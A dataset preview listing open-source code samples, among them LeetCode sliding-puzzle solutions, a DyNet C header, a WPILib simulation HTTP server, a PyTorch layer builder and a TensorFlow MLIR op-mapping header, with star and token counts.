Columns in this preview:
  max_stars_count : int64   (values 301 to 224k)
  text            : string  (lengths 6 to 1.05M)
  token_count     : int64   (values 3 to 727k)
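Each row below pairs these three columns; the bare integers interleaved between the collapsed text samples appear to be the max_stars_count and token_count values. The following is a rough, illustrative sketch only, assuming the rows can be materialized as an iterable of dicts keyed by the column names above and that <gh_stars>, <filename> and <reponame> are the inline metadata tokens exactly as they appear in the samples; the function name, the thresholds and the example row are invented for illustration.

import re
from typing import Dict, Iterable, Iterator

# Metadata tokens observed inline in the samples below, e.g. "<gh_stars>100-1000",
# "<filename>src/parser/pass.h", "<reponame>chamberone/Leaflet.PixiOverlay".
# Treating these three as the complete token set is an assumption.
META_TOKEN = re.compile(r"<(?:gh_stars|filename|reponame)>[^\s<]*")

def iter_filtered(rows: Iterable[Dict], min_stars: int = 100, max_tokens: int = 4096) -> Iterator[Dict]:
    """Yield rows whose star and token counts fall inside the given bounds,
    with the inline metadata tokens stripped from the text field."""
    for row in rows:
        if row["max_stars_count"] < min_stars or row["token_count"] > max_tokens:
            continue
        cleaned = META_TOKEN.sub("", row["text"]).lstrip()
        yield {**row, "text": cleaned}

# Example with a single hand-written row shaped like the preview above:
example = {"max_stars_count": 854, "token_count": 42, "text": "<gh_stars>100-1000 void MyFunc() {}"}
for r in iter_filtered([example]):
    print(r["text"])  # -> void MyFunc() {}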
854
<gh_stars>100-1000 __________________________________________________________________________________________________ sample 1 ms submission class Solution { public int slidingPuzzle(int[][] board) { if (noSolution(board)) return -1; int target = 42792; // 123450 = 001 010 011 100 101 000 -> 42792 boolean[] hash = new boolean[181897]; // 543210 = 101 100 011 010 001 000 -> 181896 int start = 0; for (int[] line : board) { for (int c : line) { start = (start << 3) | c; } } if (start == target) return 0; int[][] move = new int[][] { { 1, 3 }, { 0, 2, 4 }, { 1, 5 }, { 0, 4 }, { 3, 1, 5 }, { 4, 2 } }; List<Integer> now = new ArrayList<>(); now.add(start); hash[start] = true; int step = 1; while (!now.isEmpty()) { List<Integer> next = new ArrayList<>(); for (int b : now) { int i = find0(b); for (int j : move[i]) { int nb = move(b, j, i); if (nb == target) return step; if (hash[nb]) continue; hash[nb] = true; next.add(nb); } } now = next; ++step; } return -1; } int find0(int b) { int i; for (i = 0; (b & 0x7) != 0; ++i) { b >>= 3; } return 5 - i; } int move(int b, int i, int j) { i = (5 - i) * 3; j = (5 - j) * 3; int ibit = (b >> i) & 0x7; return (b & ~(0x7 << i)) | (ibit << j); } boolean noSolution(int[][] board) { int count = 0; for (int x = 1; x < 6; ++x) { int val = board[x/3][x%3]; if (val == 0) continue; for (int y = 0; y < x; ++y) { if (board[y/3][y%3] > val) ++count; } } return (count & 1) == 1; } } __________________________________________________________________________________________________ sample 36548 kb submission class Solution { public int slidingPuzzle(int[][] board) { if (board == null || board.length == 0 || board[0].length == 0) return 0; String target = "123450"; String start = ""; int row = board.length; int col = board[0].length; for (int i = 0; i < row; i++) { for (int j = 0; j < col; j++) { start += board[i][j] + ""; } } Queue<String> que = new LinkedList<String>(); Set<String> set = new HashSet<String>(); que.offer(start); set.add(start); int steps = 0; int[] d = new int[] {1, -1, 3, -3}; while (que.size() > 0) { steps++; int size = que.size(); for (int s = 0; s < size; s++) { String cur = que.poll(); if (cur.equals(target)) return steps-1; int curPos = cur.indexOf("0"); for (int k = 0; k < 4; k++) { int nextPos = curPos + d[k]; if (isValid(board, curPos, nextPos)) { char[] ca = cur.toCharArray(); ca[curPos] = ca[nextPos]; ca[nextPos] = '0'; String next = new String(ca); if (!set.contains(next)) { que.offer(next); set.add(next); } } } } } return -1; } private boolean isValid(int[][] board, int cur, int next) { int row = board.length; int col = board[0].length; if (next >= 0 && next < row * col && !(cur == 2 && next == 3) && !(cur == 3 && next == 2)) return true; else return false; } } __________________________________________________________________________________________________
2,498
3,307
<filename>contrib/c/dynet_c/init.h #ifndef DYNET_C_INIT_H_ #define DYNET_C_INIT_H_ #include <dynet_c/define.h> /** * Opaque type of DynetParams. */ typedef struct dynetDynetParams dynetDynetParams_t; /** * Creates a new DynetParams object. * @param newobj Pointer to receive a handler. * @return Status code. */ DYNET_C_API DYNET_C_STATUS dynetCreateDynetParams(dynetDynetParams_t **newobj); /** * Deletes the DynetParams object. * @param shape Pointer of a handler. * @return Status code. */ DYNET_C_API DYNET_C_STATUS dynetDeleteDynetParams(dynetDynetParams_t *params); /** * Sets the seed for random number generation. * @param params Pointer of a handler. * @param random_seed Random seed. * @return Status code. */ DYNET_C_API DYNET_C_STATUS dynetSetDynetParamsRandomSeed( dynetDynetParams_t *params, uint32_t random_seed); /** * Sets total memory to be allocated for DyNet. * @param params Pointer of a handler. * @param mem_descriptor Memory descriptor. * @return Status code. */ DYNET_C_API DYNET_C_STATUS dynetSetDynetParamsMemDescriptor( dynetDynetParams_t *params, const char *mem_descriptor); /** * Sets weight decay rate for L2 regularization. * @param params Pointer of a handler. * @param weight_decay Weight decay rate. * @return Status code. */ DYNET_C_API DYNET_C_STATUS dynetSetDynetParamsWeightDecay( dynetDynetParams_t *params, float weight_decay); /** * Specifies whether to autobatch or not. * @param params Pointer of a handler. * @param autobatch Whether to autobatch or not. * @return Status code. */ DYNET_C_API DYNET_C_STATUS dynetSetDynetParamsAutobatch( dynetDynetParams_t *params, int32_t autobatch); /** * Specifies whether to show autobatch debug info or not. * @param params Pointer of a handler. * @param profiling Whether to show autobatch debug info or not. * @return Status code. */ DYNET_C_API DYNET_C_STATUS dynetSetDynetParamsProfiling( dynetDynetParams_t *params, int32_t profiling); /** * Specifies whether to share parameters or not. * @param params Pointer of a handler. * @param shared_parameters Whether to share parameters or not. * @return Status code. */ DYNET_C_API DYNET_C_STATUS dynetSetDynetParamsSharedParameters( dynetDynetParams_t *params, DYNET_C_BOOL shared_parameters); /** * Specifies the number of requested GPUs. * @param params Pointer of a handler. * @param requested_gpus Number of requested GPUs. * @return Status code. */ DYNET_C_API DYNET_C_STATUS dynetSetDynetParamsRequestedGpus( dynetDynetParams_t *params, int32_t requested_gpus); /** * Builds a DynetParams object from command line arguments. * @param argc Command line arguments count * @param argv Command line arguments vector * @param newobj Pointer to receive a handler. * @return Status code. */ DYNET_C_API DYNET_C_STATUS dynetExtractDynetParams( int32_t argc, char **argv, DYNET_C_BOOL shared_parameters, dynetDynetParams_t **newobj); /** * Initializes DyNet. * @param params Pointer of a DynetParams. * @return Status code. */ DYNET_C_API DYNET_C_STATUS dynetInitialize(dynetDynetParams_t *params); /** * Resets random number generators. * @param seed Random seed. * @return Status code. */ DYNET_C_API DYNET_C_STATUS dynetResetRng(uint32_t seed); #endif // DYNET_C_INIT_H_
1,227
626
package org.jsmart.zerocode.core.zzignored.mocking;

import com.github.tomakehurst.wiremock.client.WireMock;
import com.github.tomakehurst.wiremock.junit.WireMockRule;
import org.jboss.resteasy.client.ClientRequest;
import org.jboss.resteasy.client.ClientResponse;
import org.jboss.resteasy.client.core.executors.ApacheHttpClientExecutor;
import org.junit.Rule;
import org.junit.Test;
import org.skyscreamer.jsonassert.JSONAssert;

import static com.github.tomakehurst.wiremock.client.WireMock.aResponse;
import static com.github.tomakehurst.wiremock.client.WireMock.givenThat;
import static com.github.tomakehurst.wiremock.client.WireMock.urlEqualTo;
import static javax.ws.rs.core.MediaType.APPLICATION_JSON;

public class WireMockJsonContentTesting {

    @Rule
    public WireMockRule rule = new WireMockRule(9073);

    @Test
    public void bioViaJson() throws Exception {
        String jsonBodyRequest = "{\n" +
                " \"id\": \"303021\",\n" +
                " \"names\": [\n" +
                " {\n" +
                " \"firstName\": \"You First\",\n" +
                " \"lastName\": \"Me Last\"\n" +
                " }\n" +
                " ]\n" +
                "}";

        givenThat(WireMock.get(urlEqualTo("/identitymanagement-services/identitymanagement-services/person/internalHandle/person_id_009/biographics/default"))
                .willReturn(aResponse()
                        .withStatus(200)
                        .withHeader("Content-Type", APPLICATION_JSON)
                        .withBody(jsonBodyRequest)));

        ApacheHttpClientExecutor httpClientExecutor = new ApacheHttpClientExecutor();
        ClientRequest clientExecutor = httpClientExecutor.createRequest("http://localhost:9073/identitymanagement-services/identitymanagement-services/person/internalHandle/person_id_009/biographics/default");
        clientExecutor.setHttpMethod("GET");

        ClientResponse serverResponse = clientExecutor.execute();
        final String respBodyAsString = (String)serverResponse.getEntity(String.class);

        JSONAssert.assertEquals(jsonBodyRequest, respBodyAsString, true);

        System.out.println("### bio response from mapping: \n" + respBodyAsString);
    }
}
951
348
<reponame>chamberone/Leaflet.PixiOverlay<gh_stars>100-1000 {"nom":"Nandy","circ":"11ème circonscription","dpt":"Seine-et-Marne","inscrits":4098,"abs":2298,"votants":1800,"blancs":15,"nuls":8,"exp":1777,"res":[{"nuance":"SOC","nom":"M. <NAME>","voix":595},{"nuance":"REM","nom":"Mme <NAME>","voix":468},{"nuance":"FI","nom":"<NAME>","voix":275},{"nuance":"FN","nom":"<NAME>","voix":244},{"nuance":"LR","nom":"Mme <NAME>","voix":100},{"nuance":"ECO","nom":"M. <NAME>","voix":36},{"nuance":"DLF","nom":"Mme <NAME>","voix":25},{"nuance":"EXG","nom":"Mme <NAME>","voix":18},{"nuance":"DIV","nom":"Mme <NAME>","voix":16}]}
252
707
// Copyright (c) FIRST and other WPILib contributors. // Open Source Software; you can modify and/or share it under the terms of // the WPILib BSD license file in the root directory of this project. #include "HALSimHttpConnection.h" #include <uv.h> #include <string_view> #include <fmt/format.h> #include <wpi/MimeTypes.h> #include <wpi/SmallVector.h> #include <wpi/StringExtras.h> #include <wpi/UrlParser.h> #include <wpi/fs.h> #include <wpi/raw_istream.h> #include <wpi/raw_uv_ostream.h> #include <wpi/uv/Request.h> namespace uv = wpi::uv; using namespace wpilibws; bool HALSimHttpConnection::IsValidWsUpgrade(std::string_view protocol) { if (m_request.GetUrl() != m_server->GetServerUri()) { MySendError(404, "invalid websocket address"); return false; } return true; } void HALSimHttpConnection::ProcessWsUpgrade() { m_websocket->open.connect_extended([this](auto conn, auto) { conn.disconnect(); // one-shot if (!m_server->RegisterWebsocket(shared_from_this())) { Log(409); m_websocket->Fail(409, "Only a single simulation websocket is allowed"); return; } Log(200); m_isWsConnected = true; std::fputs("HALWebSim: websocket connected\n", stderr); }); // parse incoming JSON, dispatch to parent m_websocket->text.connect([this](auto msg, bool) { if (!m_isWsConnected) { return; } wpi::json j; try { j = wpi::json::parse(msg); } catch (const wpi::json::parse_error& e) { std::string err("JSON parse failed: "); err += e.what(); m_websocket->Fail(400, err); return; } m_server->OnNetValueChanged(j); }); m_websocket->closed.connect([this](uint16_t, auto) { // unset the global, allow another websocket to connect if (m_isWsConnected) { std::fputs("HALWebSim: websocket disconnected\n", stderr); m_isWsConnected = false; m_server->CloseWebsocket(shared_from_this()); } }); } void HALSimHttpConnection::OnSimValueChanged(const wpi::json& msg) { // render json to buffers wpi::SmallVector<uv::Buffer, 4> sendBufs; wpi::raw_uv_ostream os{sendBufs, [this]() -> uv::Buffer { std::lock_guard lock(m_buffers_mutex); return m_buffers.Allocate(); }}; os << msg; // call the websocket send function on the uv loop m_server->GetExec().Send([self = shared_from_this(), sendBufs] { self->m_websocket->SendText(sendBufs, [self](auto bufs, wpi::uv::Error err) { { std::lock_guard lock(self->m_buffers_mutex); self->m_buffers.Release(bufs); } if (err) { fmt::print(stderr, "{}\n", err.str()); std::fflush(stderr); } }); }); } void HALSimHttpConnection::SendFileResponse(int code, std::string_view codeText, std::string_view contentType, std::string_view filename, std::string_view extraHeader) { std::error_code ec; // get file size auto size = fs::file_size(filename, ec); if (ec) { MySendError(404, "error getting file size"); return; } // open file wpi::raw_fd_istream is{filename, ec, true}; if (ec) { MySendError(404, "error opening file"); return; } wpi::SmallVector<uv::Buffer, 4> toSend; wpi::raw_uv_ostream os{toSend, 4096}; BuildHeader(os, code, codeText, contentType, size, extraHeader); SendData(os.bufs(), false); Log(code); // Read the file byte by byte wpi::SmallVector<uv::Buffer, 4> bodyData; wpi::raw_uv_ostream bodyOs{bodyData, 4096}; std::string fileBuf; size_t oldSize = 0; while (fileBuf.size() < size) { oldSize = fileBuf.size(); fileBuf.resize(oldSize + 1); is.read(&(*fileBuf.begin()) + oldSize, 1); } bodyOs << fileBuf; SendData(bodyOs.bufs(), false); if (!m_keepAlive) { m_stream.Close(); } } void HALSimHttpConnection::ProcessRequest() { wpi::UrlParser url{m_request.GetUrl(), m_request.GetMethod() == wpi::HTTP_CONNECT}; if (!url.IsValid()) 
{ // failed to parse URL MySendError(400, "Invalid URL"); return; } std::string_view path; if (url.HasPath()) { path = url.GetPath(); } if (m_request.GetMethod() == wpi::HTTP_GET && wpi::starts_with(path, '/') && !wpi::contains(path, "..") && !wpi::contains(path, "//")) { // convert to fs native representation fs::path nativePath; if (wpi::starts_with(path, "/user/")) { nativePath = fs::path{m_server->GetWebrootSys()} / fs::path{wpi::drop_front(path, 6), fs::path::format::generic_format}; } else { nativePath = fs::path{m_server->GetWebrootSys()} / fs::path{wpi::drop_front(path, 1), fs::path::format::generic_format}; } if (fs::is_directory(nativePath)) { nativePath.append("index.html"); } if (!fs::exists(nativePath) || fs::is_directory(nativePath)) { MySendError(404, fmt::format("Resource '{}' not found", path)); } else { auto contentType = wpi::MimeTypeFromPath(nativePath.string()); SendFileResponse(200, "OK", contentType, nativePath.string()); } } else { MySendError(404, "Resource not found"); } } void HALSimHttpConnection::MySendError(int code, std::string_view message) { Log(code); SendError(code, message); } void HALSimHttpConnection::Log(int code) { auto method = wpi::http_method_str(m_request.GetMethod()); fmt::print(stderr, "{} {} HTTP/{}.{} {}\n", method, m_request.GetUrl(), m_request.GetMajor(), m_request.GetMinor(), code); }
2,708
348
<reponame>chamberone/Leaflet.PixiOverlay<gh_stars>100-1000 {"nom":"Monnières","circ":"3ème circonscription","dpt":"Jura","inscrits":347,"abs":160,"votants":187,"blancs":14,"nuls":5,"exp":168,"res":[{"nuance":"MDM","nom":"<NAME>","voix":93},{"nuance":"LR","nom":"<NAME>","voix":75}]}
117
965
<gh_stars>100-1000
void MyFunc()
{
   CComObjectStack<CMyClass2> Tempobj;
   //...
}
39
767
import torch.nn as nn import torch.nn.functional as F from custom_layers.flatten_layer import FlattenLayer from custom_layers.se_block import SEBlock class ConvBuilder(nn.Module): def __init__(self, base_config): super(ConvBuilder, self).__init__() print('ConvBuilder initialized.') self.BN_eps = 1e-5 self.BN_momentum = 0.1 self.BN_affine = True self.BN_track_running_stats = True self.base_config = base_config self.cur_conv_idx = -1 def set_BN_config(self, eps, momentum, affine, track_running_stats): self.BN_eps = eps self.BN_momentum = momentum self.BN_afine = affine self.BN_track_running_stats = track_running_stats def Conv2d(self, in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, bias=True, padding_mode='zeros', use_original_conv=False): self.cur_conv_idx += 1 return nn.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size, stride=stride, padding=padding, dilation=dilation, groups=groups, bias=bias, padding_mode=padding_mode) # The running estimates are kept with a default momentum of 0.1. # By default, the elements of \gammaγ are sampled from \mathcal{U}(0, 1)U(0,1) and the elements of \betaβ are set to 0. # If track_running_stats is set to False, this layer then does not keep running estimates, and batch statistics are instead used during evaluation time as well. def BatchNorm2d(self, num_features, eps=None, momentum=None, affine=None, track_running_stats=None): if eps is None: eps = self.BN_eps if momentum is None: momentum = self.BN_momentum if affine is None: affine = self.BN_affine if track_running_stats is None: track_running_stats = self.BN_track_running_stats return nn.BatchNorm2d(num_features=num_features, eps=eps, momentum=momentum, affine=affine, track_running_stats=track_running_stats) def Sequential(self, *args): return nn.Sequential(*args) def ReLU(self): return nn.ReLU() def Conv2dBN(self, in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, padding_mode='zeros', use_original_conv=False): conv_layer = self.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size, stride=stride, padding=padding, dilation=dilation, groups=groups, bias=False, padding_mode=padding_mode, use_original_conv=use_original_conv) bn_layer = self.BatchNorm2d(num_features=out_channels) se = self.Sequential() se.add_module('conv', conv_layer) se.add_module('bn', bn_layer) if self.base_config is not None and self.base_config.se_reduce_scale is not None and self.base_config.se_reduce_scale > 0 \ and (self.base_config.se_layers is None or self.cur_conv_idx in self.base_config.se_layers): print('%%%%%%%%%%% USE SEBLock !') se.add_module('se', SEBlock(input_channels=out_channels, internal_neurons=out_channels // self.base_config.se_reduce_scale)) return se def Conv2dBNReLU(self, in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, padding_mode='zeros', use_original_conv=False): conv = self.Conv2dBN(in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size, stride=stride, padding=padding, dilation=dilation, groups=groups, padding_mode=padding_mode, use_original_conv=use_original_conv) conv.add_module('relu', self.ReLU()) return conv def ReLUConv2dBN(self, in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, padding_mode='zeros', use_original_conv=False): conv_layer = self.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size, stride=stride, padding=padding, dilation=dilation, 
groups=groups, bias=False, padding_mode=padding_mode, use_original_conv=use_original_conv) bn_layer = self.BatchNorm2d(num_features=out_channels) se = self.Sequential() se.add_module('relu', self.ReLU()) se.add_module('conv', conv_layer) se.add_module('bn', bn_layer) return se def Conv2dReLU(self, in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, padding_mode='zeros', bias=True, use_original_conv=False): conv = self.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size, stride=stride, padding=padding, dilation=dilation, groups=groups, padding_mode=padding_mode, bias=bias, use_original_conv=use_original_conv) result = self.Sequential() result.add_module('conv', conv) result.add_module('relu', self.ReLU()) return conv def BNReLUConv2d(self, in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, padding_mode='zeros', use_original_conv=False): bn_layer = self.BatchNorm2d(num_features=in_channels) conv_layer = self.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size, stride=stride, padding=padding, dilation=dilation, groups=groups, bias=False, padding_mode=padding_mode) se = self.Sequential() se.add_module('bn', bn_layer) se.add_module('relu', self.ReLU()) se.add_module('conv', conv_layer) return se def Linear(self, in_features, out_features, bias=True): return nn.Linear(in_features=in_features, out_features=out_features, bias=bias) def IntermediateLinear(self, in_features, out_features, bias=True): return nn.Linear(in_features=in_features, out_features=out_features, bias=bias) def Identity(self): return nn.Identity() def ResIdentity(self, num_channels): return nn.Identity() def ResNetAlignOpr(self, channels): return nn.Identity() def Dropout(self, keep_prob): return nn.Dropout(p=1-keep_prob) def Maxpool2d(self, kernel_size, stride=None, padding=0): return nn.MaxPool2d(kernel_size=kernel_size, stride=stride, padding=padding) def Avgpool2d(self, kernel_size, stride=None, padding=0): return nn.AvgPool2d(kernel_size=kernel_size, stride=stride, padding=padding) def Flatten(self): return FlattenLayer() def GAP(self, kernel_size): gap = nn.Sequential() gap.add_module('avg', self.Avgpool2d(kernel_size=kernel_size, stride=kernel_size)) gap.add_module('flatten', self.Flatten()) return gap def relu(self, in_features): return F.relu(in_features) def max_pool2d(self, in_features, kernel_size, stride, padding): return F.max_pool2d(in_features, kernel_size=kernel_size, stride=stride, padding=padding) def avg_pool2d(self, in_features, kernel_size, stride, padding): return F.avg_pool2d(in_features, kernel_size=kernel_size, stride=stride, padding=padding) def flatten(self, in_features): result = in_features.view(in_features.size(0), -1) return result def add(self, a, b): return a + b def GroupNorm(self, num_features, affine=True): return nn.GroupNorm(num_groups=8, num_channels=num_features, affine=affine) def Conv2dGroupNorm(self, in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, padding_mode='zeros', use_original_conv=True): assert use_original_conv conv_layer = self.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size, stride=stride, padding=padding, dilation=dilation, groups=groups, bias=False, padding_mode=padding_mode) gn_layer = self.GroupNorm(out_channels) se = self.Sequential() se.add_module('conv', conv_layer) se.add_module('bn', gn_layer) return se def OriginConv2dBN(self, in_channels, out_channels, kernel_size, 
stride=1, padding=0, dilation=1, groups=1, padding_mode='zeros'): conv_layer = nn.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size, stride=stride, padding=padding, dilation=dilation, groups=groups, bias=False, padding_mode=padding_mode) bn_layer = self.BatchNorm2d(num_features=out_channels) se = self.Sequential() se.add_module('conv', conv_layer) se.add_module('bn', bn_layer) return se
3,990
345
import os
import unittest

from programy.utils.files.filewriter import ContentFileWriter
from programy.utils.files.filewriter import FileWriterConfiguration

from programytest.utils.files.utils import get_os_specific_path


class ContentFileWriterTests(unittest.TestCase):

    def test_init(self):
        config = FileWriterConfiguration(filename="filename.test", fileformat="txt", mode="a", encoding="utf-8",
                                         delete_on_start=False)

        writer = ContentFileWriter(config, content_type="txt")
        self.assertIsNotNone(writer)

        writer.display_debug_info()

        if os.path.exists("filename.test"):
            os.remove("filename.test")
        self.assertFalse(os.path.exists("filename.test"))
251
388
/* Copyright 2019 The TensorFlow Authors. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ==============================================================================*/ #ifndef TENSORFLOW_COMPILER_MLIR_XLA_TRANSFORMS_MAP_XLA_TO_SCALAR_OP_H_ #define TENSORFLOW_COMPILER_MLIR_XLA_TRANSFORMS_MAP_XLA_TO_SCALAR_OP_H_ #include "llvm/ADT/StringRef.h" #include "llvm/ADT/StringSwitch.h" #include "mlir/Dialect/StandardOps/IR/Ops.h" // TF:llvm-project #include "tensorflow/compiler/mlir/xla/ir/hlo_ops.h" #include "tensorflow/compiler/mlir/xla/ir/lhlo_ops.h" namespace mlir { namespace xla_lhlo { template <typename LHLO_BinaryOp> struct ScalarOp; template <> struct ScalarOp<xla_lhlo::AddOp> { using FOp = ::mlir::AddFOp; using IOp = ::mlir::AddIOp; }; template <> struct ScalarOp<xla_hlo::AddOp> { using FOp = ::mlir::AddFOp; using IOp = ::mlir::AddIOp; }; template <> struct ScalarOp<xla_lhlo::CompareOp> { using FOp = ::mlir::CmpFOp; using IOp = ::mlir::CmpIOp; }; template <> struct ScalarOp<xla_hlo::CompareOp> { using FOp = ::mlir::CmpFOp; using IOp = ::mlir::CmpIOp; }; template <> struct ScalarOp<xla_lhlo::DivOp> { using FOp = ::mlir::DivFOp; using IOp = ::mlir::SignedDivIOp; }; template <> struct ScalarOp<xla_hlo::DivOp> { using FOp = ::mlir::DivFOp; using IOp = ::mlir::SignedDivIOp; }; template <> struct ScalarOp<xla_lhlo::MulOp> { using FOp = ::mlir::MulFOp; using IOp = ::mlir::MulIOp; }; template <> struct ScalarOp<xla_hlo::MulOp> { using FOp = ::mlir::MulFOp; using IOp = ::mlir::MulIOp; }; template <> struct ScalarOp<xla_lhlo::RemOp> { using FOp = ::mlir::RemFOp; using IOp = ::mlir::SignedRemIOp; }; template <> struct ScalarOp<xla_hlo::RemOp> { using FOp = ::mlir::RemFOp; using IOp = ::mlir::SignedRemIOp; }; template <> struct ScalarOp<xla_lhlo::SubOp> { using FOp = ::mlir::SubFOp; using IOp = ::mlir::SubIOp; }; template <> struct ScalarOp<xla_hlo::SubOp> { using FOp = ::mlir::SubFOp; using IOp = ::mlir::SubIOp; }; template <typename XLA_BinaryOp> using ScalarFOp = typename ScalarOp<XLA_BinaryOp>::FOp; template <typename XLA_BinaryOp> using ScalarIOp = typename ScalarOp<XLA_BinaryOp>::IOp; template <typename... Args> struct MapXlaOpToStdScalarOpImpl { Value operator()(Location loc, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return nullptr; } }; template <typename StdScalarOp> struct MapXlaOpToStdScalarOpImpl<StdScalarOp> { Value operator()(Location loc, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return b->template create<StdScalarOp>(loc, result_types, args, mlir::None); } }; template <typename SupportedType, typename StdScalarOp, typename... 
Args> struct MapXlaOpToStdScalarOpImpl<SupportedType, StdScalarOp, Args...> { Value operator()(Location loc, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { Type element_type = args.front().getType(); if (element_type.isa<SupportedType>()) { return b->template create<StdScalarOp>(loc, result_types, args, mlir::None); } return MapXlaOpToStdScalarOpImpl<Args...>{}(loc, result_types, args, b); } }; template <typename XlaOp> inline Value MapXlaOpToStdScalarOp(XlaOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return MapXlaOpToStdScalarOpImpl<IntegerType, ScalarIOp<XlaOp>, FloatType, ScalarFOp<XlaOp>>{}(xla_op.getLoc(), result_types, args, b); } // TODO(ravishankarm): Find a way to reduce code-bloat in HLO and LHLO // specialization. template <> inline Value MapXlaOpToStdScalarOp<xla_lhlo::AbsOp>(xla_lhlo::AbsOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return MapXlaOpToStdScalarOpImpl<FloatType, ::mlir::AbsFOp>{}( xla_op.getLoc(), result_types, args, b); } template <> inline Value MapXlaOpToStdScalarOp<xla_hlo::AbsOp>(xla_hlo::AbsOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return MapXlaOpToStdScalarOpImpl<FloatType, ::mlir::AbsFOp>{}( xla_op.getLoc(), result_types, args, b); } template <> inline Value MapXlaOpToStdScalarOp<xla_lhlo::AndOp>(xla_lhlo::AndOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return MapXlaOpToStdScalarOpImpl<IntegerType, ::mlir::AndOp>{}( xla_op.getLoc(), result_types, args, b); } template <> inline Value MapXlaOpToStdScalarOp<xla_hlo::AndOp>(xla_hlo::AndOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return MapXlaOpToStdScalarOpImpl<IntegerType, ::mlir::AndOp>{}( xla_op.getLoc(), result_types, args, b); } template <typename PredicateType> inline Optional<PredicateType> getCmpPredicate( StringRef xla_comparison_direction) { return llvm::None; } template <> inline Optional<CmpFPredicate> getCmpPredicate<CmpFPredicate>( StringRef xla_comparison_direction) { return llvm::StringSwitch<CmpFPredicate>(xla_comparison_direction) .Case("EQ", CmpFPredicate::OEQ) .Case("NE", CmpFPredicate::ONE) .Case("GE", CmpFPredicate::OGE) .Case("GT", CmpFPredicate::OGT) .Case("LE", CmpFPredicate::OLE) .Case("LT", CmpFPredicate::OLT) .Default(CmpFPredicate::NumPredicates); } template <> inline Optional<CmpIPredicate> getCmpPredicate<CmpIPredicate>( StringRef xla_comparison_direction) { return llvm::StringSwitch<Optional<CmpIPredicate>>(xla_comparison_direction) .Case("EQ", CmpIPredicate::eq) .Case("NE", CmpIPredicate::ne) .Case("GE", CmpIPredicate::sge) .Case("GT", CmpIPredicate::sgt) .Case("LE", CmpIPredicate::sle) .Case("LT", CmpIPredicate::slt) .Default(llvm::None); } template <typename XLACompareOpTy> inline Value MapXlaCompareOpToStdScalarOp(XLACompareOpTy xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { const auto& lhs = args[0]; const auto& rhs = args[1]; Type element_type = lhs.getType(); if (element_type.isSignlessInteger()) { Optional<CmpIPredicate> predicate = getCmpPredicate<CmpIPredicate>(xla_op.comparison_direction()); assert(predicate.hasValue() && "expected valid comparison direction"); return b->create<ScalarIOp<XLACompareOpTy>>(xla_op.getLoc(), predicate.getValue(), lhs, rhs); } if (element_type.isa<FloatType>()) { Optional<CmpFPredicate> predicate = getCmpPredicate<CmpFPredicate>(xla_op.comparison_direction()); assert(predicate.hasValue() && "expected valid comparison 
direction"); return b->create<ScalarFOp<XLACompareOpTy>>(xla_op.getLoc(), predicate.getValue(), lhs, rhs); } return nullptr; } template <> inline Value MapXlaOpToStdScalarOp<xla_lhlo::CompareOp>( xla_lhlo::CompareOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return MapXlaCompareOpToStdScalarOp<xla_lhlo::CompareOp>(xla_op, result_types, args, b); } template <> inline Value MapXlaOpToStdScalarOp<xla_hlo::CompareOp>( xla_hlo::CompareOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return MapXlaCompareOpToStdScalarOp<xla_hlo::CompareOp>(xla_op, result_types, args, b); } template <> inline Value MapXlaOpToStdScalarOp<xla_lhlo::CopyOp>( xla_lhlo::CopyOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return args.front(); } template <> inline Value MapXlaOpToStdScalarOp<xla_hlo::CopyOp>(xla_hlo::CopyOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return args.front(); } template <> inline Value MapXlaOpToStdScalarOp<xla_lhlo::ExpOp>(xla_lhlo::ExpOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return MapXlaOpToStdScalarOpImpl<FloatType, ::mlir::ExpOp>{}( xla_op.getLoc(), result_types, args, b); } template <> inline Value MapXlaOpToStdScalarOp<xla_hlo::ExpOp>(xla_hlo::ExpOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return MapXlaOpToStdScalarOpImpl<FloatType, ::mlir::ExpOp>{}( xla_op.getLoc(), result_types, args, b); } template <> inline Value MapXlaOpToStdScalarOp<xla_lhlo::CeilOp>( xla_lhlo::CeilOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return MapXlaOpToStdScalarOpImpl<FloatType, ::mlir::CeilFOp>{}( 